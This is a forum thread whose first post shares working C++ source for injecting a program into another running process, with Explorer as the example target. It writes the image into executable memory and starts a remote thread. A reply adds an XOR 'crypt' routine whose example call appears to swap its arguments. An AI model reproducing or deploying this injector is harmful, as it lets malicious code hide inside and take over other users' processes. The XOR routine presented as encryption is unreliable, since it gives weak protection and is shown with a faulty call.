Results 1 to 3 of 3
  1. #1
    Dwar
    Dwar is offline
    Veteran Dwar's Avatar
    Join Date
    2010 Mar
    Posts
    2,222
    Thanks Thanks Given 
    211
    Thanks Thanks Received 
    2,230
    Thanked in
    292 Posts
    Rep Power
    10

    [C++] Process Injection

    Process Injection
    This project allows you to copy the local process into another remote process and execute it. There are no requirements for your program for this to work. All you do is call the function, and sit back and the program will run inside the remote address space just as if it was in it's own. You do not need to pass memory addresses to the thread because, the Injected program is set at it's own original address in memory so all variables and functions defined will still work.
    But this will not work on all running processes because the ImageBase required by the injector executable maybe already Allocated by the process, therefore causing the VirtualAllocEx to fail. If you were to make this work on all process you would first have to rebase the injector in memory, then inject it.
    The default imagebase for an executable most of the time is 0x400000 which is available in Explorer.exe, so this process was chosen as example.

    inject.h
     /* Injection Prototypes */
    #include <windows.h>

    BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam);


    inject.h
     #include "inject.h"

    BOOL InjectExecutable(DWORD dwPid, LPTHREAD_START_ROUTINE lpStartProc, LPVOID lpParam)
    {
    HMODULE hModule, hNewModule;
    DWORD dwSize;
    HANDLE hProcess;

    IMAGE_DOS_HEADER ImageDosHeader;
    IMAGE_OPTIONAL_HEADER32 ImageOptionalHeader;

    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);

    if (hProcess == NULL)
    {
    return FALSE;
    }

    hModule = GetModuleHandle(NULL);

    CopyMemory(&ImageDosHeader, hModule, sizeof(ImageDosHeader));

    CopyMemory(&ImageOptionalHeader, ((BYTE *)hModule + sizeof(DWORD) + ImageDosHeader.e_lfanew + sizeof(IMAGE_FILE_HEADER)), sizeof(ImageOptionalHeader));

    dwSize = ImageOptionalHeader.SizeOfImage;

    hNewModule = VirtualAllocEx(hProcess, hModule, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    if (hNewModule == NULL)
    {
    return FALSE;
    }

    WriteProcessMemory(hProcess, hNewModule, hModule, dwSize, NULL);

    CreateRemoteThread(hProcess, 0, 0, lpStartProc, lpParam, 0, NULL);

    return TRUE;
    }


    example.c
     #include "inject.h"

    DWORD WINAPI RemFunc(LPVOID lpParam);

    void WinMainCRTStartup()
    {
    DWORD dwPid;

    GetWindowThreadProcessId(FindWindow("ProgMan", NULL), &dwPid);

    InjectExecutable(dwPid, &RemFunc, NULL);
    }

    DWORD WINAPI RemFunc(LPVOID lpParam)
    {
    MessageBox(HWND_DESKTOP, "Greetings from the Hijacked Process!!!!nDone with ProcessInjectionn.::ANUBIS::.", "Explorer", MB_OK);
    ExitThread(0);
    return 0;
    }

    Author: ANUBIS

    Please register or login to download attachments.

    Please, post your questions on forum, not by PM or mail

    I spend my time, so please pay a little bit of your time to keep world in equilibrium

  2. #2
    11moon11
    11moon11 is offline
    Guest
    Join Date
    2013 Jul
    Posts
    2
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    1
    Thanked in
    1 Post
    Rep Power
    0

    Post XOR Crypt! C++

    Function, which made your text crypted:
    Code:
    //---------------------------------------------------------------------------
    AnsiString XOR_Crypt(AnsiString in, AnsiString pass)
    {
            AnsiString out;
            for (int x=1;x<in.Length()+1;x++)
            {
                    out += (char)(in[x] ^ pass[x%pass.Length()+1]);
            }
            return out;
    }
    And how to crypt your text:
    Code:
    ShowMessage(XOR_Crypt("pass", "text"));
    PROFIT!

  3. #3
    Viloresi
    Viloresi is offline
    Guest
    Join Date
    2014 Jun
    Posts
    1
    Thanks Thanks Given 
    0
    Thanks Thanks Received 
    0
    Thanked in
    0 Posts
    Rep Power
    0

    Thanks

    this is the most common injection and for what i can see this doesn't use kernel functions... so thank you very much for sharing

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •